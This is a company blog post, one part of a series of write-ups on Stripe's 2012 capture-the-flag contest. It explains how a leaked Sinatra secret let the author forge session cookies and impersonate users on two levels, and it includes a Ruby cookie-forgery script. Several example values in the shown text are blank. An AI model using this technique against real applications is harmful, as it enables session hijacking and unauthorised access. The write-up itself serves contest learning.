Sep 18, 2012

Stripe’s Capture the Flag 2.0 – Bonus

Credera Team

Credera Team

Default image background

This article is part 10 of a 10 series blog detailing the approaches and solutions to hacking through Stripe’s 2012 CTF 2.0. To continue from the parent article, or see more hacks, please click here.

This blog entry details some bonus approaches used by Andre Azzolini in attacking the Stripe CTF 2.0 Challenge Levels 5 and 6.


This vulnerability was patched early on, but I was able to use it to exploit both levels 5 and 6. At first, Sinatra 500 errors would generate the debug Sinatra page, which just so happened to include the secret key that the server was using to sign session cookies. In my case, it looked like this:


You also have access to your session cookie, which might have looked like this:


Unfortunately, Sinatra is using a terrible HMAC function (really, it’s a MAC function — if it used HMAC, this wouldn’t have been a vulnerability).

Since we know this, we are able to manipulate our session cookie to replace certain values and still be valid. For example, for level 5, I replaced “” with “”. For level 6, I replaced my username with “level07-password-holder”. This then tricks Sinatra into thinking you’re someone else. You can achieve this with the following simple code:

require 'uri' require 'base64' require 'readline' require 'openssl'

def generate_hmac(data, secret) OpenSSL::HMAC.hexdigest(, secret, data) end

decoded_original = Marshal.load Base64.decode64 URI.unescape Readline.readline 'original: ' # paste in the original cookie value for this value_to_be_replaced = Readline.readline 'value to be replaced:' # this would be "" for example value_to_replace_with = Readline.readline 'value to replace with:' # this would be "" for example

hacked_value = decoded_original.inspect.sub(value_to_be_replaced, value_to_replace_with) encoded_hacked = Base64.encode64 Marshal.dump eval hacked_value

this is the unpacked representation of the "dMx..." key posted above

secret = [100, 77, 120, -20, -31, -80, 102, 23, 23, 48, -118, -98, 99, -35, -28, 6, 7, -50, -45, 5, 27, -51, -47, 14].pack('c*')

hmac = generate_hmac(encoded_hacked, secret) uri_encoded_hacked = URI.escape encoded_hacked puts "\nThe hacked cookie is: #{uri_encoded_hacked}--#{hmac}"

Simply set your session cookie to the value printed by the program, and you’ll have gained the authorization you were after!


These solutions are presented as a unique approach to a recent CTF hacking contest as an outreach of the Credera Security Team. All ‘hacking’ was performed in an ethical manner in accordance with Credera’s Core Values. For further information on Credera’s offerings in ethical hacking, security, compliance, and OWASP preparedness please contact us at

Conversation Icon

Contact Us

Ready to achieve your vision? We're here to help.

We'd love to start a conversation. Fill out the form and we'll connect you with the right person.

Searching for a new career?

View job openings